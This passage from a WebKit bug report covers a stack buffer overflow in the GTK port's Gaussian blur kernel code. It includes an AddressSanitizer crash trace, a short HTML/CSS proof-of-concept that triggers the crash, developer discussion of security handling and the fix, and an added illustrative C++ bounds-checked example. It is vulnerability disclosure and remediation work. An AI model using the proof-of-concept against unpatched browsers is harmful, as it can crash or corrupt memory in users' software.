    #19 0x7f4c07912bd1 in std::__invoke_result<WebKit::WebProcess, WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>::type std::__invoke<void IPC::callMemberFunction<WebKit::WebProcess, WebKit::WebProcess, void (WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters> >(WebKit::WebProcess*, void (WebKit::WebProcess::*)(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>&&)::'lambda'(auto&&...), WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>(WebKit::WebProcess&&, WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>&&, WebKit::WebPageCreationParameters&&) /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/bits/invoke.h:96:14
    #20 0x7f4c07912bd1 in decltype(auto) std::__apply_impl<void IPC::callMemberFunction<WebKit::WebProcess, WebKit::WebProcess, void (WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters> >(WebKit::WebProcess*, void (WebKit::WebProcess::*)(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>&&)::'lambda'(auto&&...), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>, 0ul, 1ul>(WebKit::WebProcess&&, WebKit::WebProcess&&, std::integer_sequence<unsigned long, 0ul, 1ul>) /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/tuple:1854:14
    #21 0x7f4c07912bd1 in decltype(auto) std::apply<void IPC::callMemberFunction<WebKit::WebProcess, WebKit::WebProcess, void (WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters> >(WebKit::WebProcess*, void (WebKit::WebProcess::*)(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>&&)::'lambda'(auto&&...), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters> >(WebKit::WebProcess&&, WebKit::WebProcess&&) /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/tuple:1865:14
    #22 0x7f4c07912bd1 in void IPC::callMemberFunction<WebKit::WebProcess, WebKit::WebProcess, void (WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters> >(WebKit::WebProcess*, void (WebKit::WebProcess::*)(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>&&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Platform/IPC/HandleMessage.h:134:5
    #23 0x7f4c07912bd1 in void IPC::handleMessage<Messages::WebProcess::CreateWebPage, WebKit::WebProcess, WebKit::WebProcess, void (WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&)>(IPC::Connection&, IPC::Decoder&, WebKit::WebProcess*, void (WebKit::WebProcess::*)(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&)) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Platform/IPC/HandleMessage.h:236:9
    #24 0x7f4c07912bd1 in WebKit::WebProcess::didReceiveWebProcessMessage(IPC::Connection&, IPC::Decoder&) /home/fuzz/Downloads/webkitgtk-2.41.92/build/DerivedSources/WebKit/WebProcessMessageReceiver.cpp:122:16
    #25 0x7f4c08c93deb in WebKit::WebProcess::didReceiveMessage(IPC::Connection&, IPC::Decoder&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/WebProcess/WebProcess.cpp:932:9
    #26 0x7f4c0831fee0 in IPC::Connection::dispatchMessage(IPC::Decoder&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Platform/IPC/Connection.cpp:1233:15
    #27 0x7f4c083204a5 in IPC::Connection::dispatchMessage(std::unique_ptr<IPC::Decoder, std::default_delete<IPC::Decoder> >) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Platform/IPC/Connection.cpp:1281:9
    #28 0x7f4c08320cb6 in IPC::Connection::dispatchOneIncomingMessage() /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Platform/IPC/Connection.cpp:1346:5
    #29 0x7f4c0832338f in IPC::Connection::enqueueIncomingMessage(std::unique_ptr<IPC::Decoder, std::default_delete<IPC::Decoder> >)::$_15::operator()() const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Platform/IPC/Connection.cpp:1195:28
    #30 0x7f4c0832338f in WTF::Detail::CallableWrapper<IPC::Connection::enqueueIncomingMessage(std::unique_ptr<IPC::Decoder, std::default_delete<IPC::Decoder> >)::$_15, void>::call() /home/fuzz/Downloads/webkitgtk-2.41.92/build/WTF/Headers/wtf/Function.h:53:39
    #31 0x7f4c0499d4a9 in WTF::Function<void ()>::operator()() const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/Function.h:82:35
    #32 0x7f4c0499d4a9 in WTF::RunLoop::performWork() /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/RunLoop.cpp:147:9
    #33 0x7f4c04b07d98 in WTF::RunLoop::RunLoop()::$_1::operator()(void*) const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/glib/RunLoopGLib.cpp:80:42
    #34 0x7f4c04b07d98 in WTF::RunLoop::RunLoop()::$_1::__invoke(void*) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/glib/RunLoopGLib.cpp:79:43
    #35 0x7f4c04b05433 in WTF::RunLoop::$_0::operator()(_GSource*, int (*)(void*), void*) const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/glib/RunLoopGLib.cpp:53:28
    #36 0x7f4c04b05433 in WTF::RunLoop::$_0::__invoke(_GSource*, int (*)(void*), void*) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/glib/RunLoopGLib.cpp:45:5
    #37 0x7f4bfcb20c43 in g_main_context_dispatch (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x55c43) (BuildId: c74e800dfd5f72649d673b44292f4a817e45150b)

SUMMARY: AddressSanitizer: stack-buffer-overflow /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperGL.cpp:359:23 in WebCore::computeGaussianKernel(float, std::array<float, 6ul>&, std::array<float, 6ul>&)
Shadow bytes around the buggy address:
  0x0fe9f651cd60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe9f651cd70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe9f651cd80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe9f651cd90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe9f651cda0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0fe9f651cdb0: 00 00 00 00 f1 f1 f1 f1 00 00 00 00 00[04]f2 f2
  0x0fe9f651cdc0: f2 f2 00 f2 f2 f2 00 00 00 f2 f2 f2 f2 f2 00 00
  0x0fe9f651cdd0: 00 f2 f2 f2 f2 f2 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8
  0x0fe9f651cde0: f8 f8 f8 f8 f8 f8 f2 f2 f2 f2 f8 f8 f8 f8 f8 f8
  0x0fe9f651cdf0: f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f3 f3 f3 f3 f3 f3
  0x0fe9f651ce00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==237950==ABORTING
```

5. Proof-of-Concept

```html
<style>
.class2 { 
  -webkit-filter: blur(0em) drop-shadow(91px 36px 1024em black);
}
x48,.class0:read-only { 
  border-style: groove outset outset hidden;
}
*:nth-child(odd) { 
  display: block table;
}
style { 
  -webkit-animation: keyframes2,keyframes3 0.5s steps(454),ease-out alternate-reverse,normal both;
}

@keyframes keyframes3 {
  40% { -webkit-transform: scaleX(43) }
}
</style>

<a id="x56" ping="x" draggable="true" class="class2" translate="yes" itemtype="AAAAAAAA" charset="UTF-16" contextmenu="foo" slot="foo" webkitdropzone="copy" onfocus="f3()">
<image id="x21" tabindex="-1" preserveAspectRatio="xMaxYMax" buffered-rendering="dynamic" class="class0" paint-order="stroke markers" width="0px" vector-effect="non-scaling-stroke" clip="rect(auto,0px,auto,auto)" transform="rotate(180deg) translate(100%,284em)" x="16%">
```

6. Software Download Link
a.	https://webkitgtk.org/
Comment 1 Radar WebKit Bug Importer 2023-12-01 05:35:14 PST
<rdar://problem/119031226>
Comment 2 Fujii Hironori 2023-12-03 13:06:35 PST
Thank you very much for the report!
Comment 3 Fujii Hironori 2023-12-03 13:09:43 PST
Created attachment 468845 [details]
WIP patch
Comment 4 Fujii Hironori 2023-12-03 13:41:54 PST
Created attachment 468846 [details]
test case 2
Comment 5 Fujii Hironori 2023-12-03 13:53:37 PST
Hi, Brent.

If a security bug is assigned to webkit-unassigned@lists.webkit.org, comments are published like 
https://lists.webkit.org/pipermail/webkit-unassigned/2023-December/1136022.html

Could you search security bugs assigned to webkit-unassigned@lists.webkit.org?
Comment 6 Michael Catanzaro 2023-12-03 15:26:19 PST
I will request a CVE for this issue.

(In reply to Fujii Hironori from comment #5)
> Hi, Brent.
> 
> If a security bug is assigned to webkit-unassigned@lists.webkit.org, comments
> are published like 
> https://lists.webkit.org/pipermail/webkit-unassigned/2023-December/1136022.
> html

Ouch...
Comment 7 Carlos Garcia Campos 2023-12-04 00:52:38 PST
The shadow blur patches were reverted in our stable branch because they broke rendering in rpi, so this might not affect 2.42.2.
Comment 8 Michael Catanzaro 2023-12-04 06:57:15 PST
OK great. Since no stable release is affected by this bug, and requesting CVEs for unstable releases that are only used by testers is not worthwhile, we don't need a CVE after all. But the bug still needs to be fixed in main, of course. (Good find; thanks for reporting this issue.)

I had wondered why these patches had been reverted. If they broke rendering on Raspberry Pi and it's still broken in main, maybe we should revert them there too? Are we really comfortable with Raspberry Pi being broken?
Comment 9 Fujii Hironori 2023-12-04 11:53:23 PST
bug#261870 is tracking the rpi issue.
Comment 10 Fujii Hironori 2023-12-05 20:01:11 PST
Created attachment 468907 [details]
Patch
Comment 11 Fujii Hironori 2023-12-05 20:55:40 PST
Invoking 'webkit-patch upload' complains.

> The patch you are uploading references https://bugs.webkit.org/show_bug.cgi?id=265659
> https://bugs.webkit.org/show_bug.cgi?id=265659 matches 'project:Security' and is thus redacted
> Please use 'git-webkit' to upload this fix. 'webkit-patch' does not support security changes

Should I really use git-webkit for a security bug?
Comment 12 Fujii Hironori 2023-12-06 05:04:03 PST
Comment on attachment 468907 [details]
Patch

EWS doesn't process this patch. I have to create a GitHub pull request.
Comment 13 Michael Catanzaro 2023-12-06 06:07:08 PST
(In reply to Fujii Hironori from comment #11)
> Should I really use git-webkit for a security bug?

Just make sure it creates the pull request in the security repo and not the public repo.
Comment 14 Jonathan Bedard 2023-12-06 14:03:45 PST
Pull request: https://github.com/WebKit/WebKit-security/pull/50
Comment 15 Jonathan Bedard 2023-12-06 14:06:31 PST
I reached out to Fuji, he isn't part of the security group yet, so I've posted the PR for him to get it reviewed. As Michael points out, this hasn't shipped yet, so the PR is made against `main` in WebKit/WebKit-security, we'll land in public once the change is reviewed and clears EWS.
Comment 16 Michael Catanzaro 2023-12-14 05:40:20 PST
So in the pull request I requested the addition of a RELEASE_ASSERT() to make sure the buffer index is in range. I also approved the pull request. But finally I remembered that Fujii doesn't have access to the security repo yet and could not see any of my review feedback.

I don't think we need to follow the standard security process for this particular bug because (a) it doesn't affect Apple products, and (b) it also doesn't affect stable releases of WPE/GTK (yet). It can't even land on our stable branches since the commit it fixes is reverted there, so the only place for the fix to land is main. Accordingly, I'm making this bug public now. Fujii, please prepare a pull request using the normal repo and we can get this landed. Thanks!
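Added illustration of the bug class and of the in-range check comment 16 asks for. This is not WebKit's computeGaussianKernel() and not the patch that landed; it only borrows the std::array<float, 6> signature from the ASan summary above. The radius-to-tap-count formula, the sigma choice, and every name below are assumptions made for the example; the point is that the loop bound is clamped to the array capacity before any write, so a radius as large as the one in the PoC (1024em) can no longer drive the index past the end of the stack array.

```cpp
// Example code for this bug page, not WebKit's implementation.
// Capacity 6 mirrors the std::array<float, 6> seen in the ASan report;
// the mapping from radius to tap count is an assumption for illustration.
#include <algorithm>
#include <array>
#include <cmath>
#include <cstddef>
#include <cstdio>

constexpr std::size_t kKernelCapacity = 6;  // centre tap + 5 taps on one side
using KernelArray = std::array<float, kKernelCapacity>;

struct KernelResult {
    std::size_t taps;  // entries actually written to kernel/offsets (<= capacity)
    bool clamped;      // true when the radius asked for more taps than fit
};

// Assumed conversion: sigma ~ radius / 2, cover about 3 sigma on one side.
// Unbounded growth with radius is the property that matters here.
static std::size_t kernelHalfSizeFromRadius(float radius)
{
    if (!(radius > 0.0f))  // also rejects NaN
        return 1;
    return 1 + static_cast<std::size_t>(std::ceil(1.5f * radius));
}

// Fills a one-sided, normalised Gaussian kernel into fixed-size arrays.
// The required tap count is clamped to the array size before the loop, so
// no index can exceed kernel.size() - 1 whatever the radius is.
static KernelResult computeGaussianKernelChecked(float radius, KernelArray& kernel, KernelArray& offsets)
{
    const std::size_t required = kernelHalfSizeFromRadius(radius);
    const std::size_t halfSize = std::min(required, kernel.size());
    // A RELEASE_ASSERT(halfSize <= kernel.size()) here would turn any future
    // mismatch into a clean abort instead of a silent stack write.
    const float sigma = std::max(radius / 2.0f, 0.5f);

    float sum = 0.0f;
    for (std::size_t i = 0; i < halfSize; ++i) {
        const float x = static_cast<float>(i);
        kernel[i] = std::exp(-(x * x) / (2.0f * sigma * sigma));
        offsets[i] = x;
        sum += (i == 0) ? kernel[i] : 2.0f * kernel[i];  // mirrored taps count twice
    }
    for (std::size_t i = 0; i < halfSize; ++i)
        kernel[i] /= sum;
    for (std::size_t i = halfSize; i < kernel.size(); ++i) {  // leave no stale data
        kernel[i] = 0.0f;
        offsets[i] = 0.0f;
    }
    return { halfSize, required > kernel.size() };
}

// Convenience wrappers so behaviour can be checked by radius alone.
static KernelResult buildKernel(float radius)
{
    KernelArray kernel {}, offsets {};
    return computeGaussianKernelChecked(radius, kernel, offsets);
}

// Sum of all taps (centre once, the rest mirrored); should be 1 after normalisation.
static float normalizedWeightSum(float radius)
{
    KernelArray kernel {}, offsets {};
    const KernelResult r = computeGaussianKernelChecked(radius, kernel, offsets);
    float sum = kernel[0];
    for (std::size_t i = 1; i < r.taps; ++i)
        sum += 2.0f * kernel[i];
    return sum;
}

int main()
{
    // 1024em at a 16px root font size is 16384px, the order of the PoC's radius.
    for (float radius : { 1.0f, 2.0f, 16384.0f }) {
        const KernelResult r = buildKernel(radius);
        std::printf("radius %.0f: taps=%zu clamped=%d sum=%.4f\n",
                    radius, r.taps, r.clamped ? 1 : 0, normalizedWeightSum(radius));
    }
    return 0;
}
```

Clamping keeps rendering going with a wider-than-ideal tap spacing; a RELEASE_ASSERT instead converts the same condition into a deterministic crash, which is the trade-off a reviewer would weigh for a code path reachable from page content.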
Comment 17 Fujii Hironori 2023-12-14 12:16:57 PST
Public PR: https://github.com/WebKit/WebKit/pull/21821
Comment 18 EWS 2023-12-14 16:11:55 PST
Committed 272081@main (15dc72ca9521): <https://commits.webkit.org/272081@main>

Reviewed commits have been landed. Closing PR #21821 and removing active labels.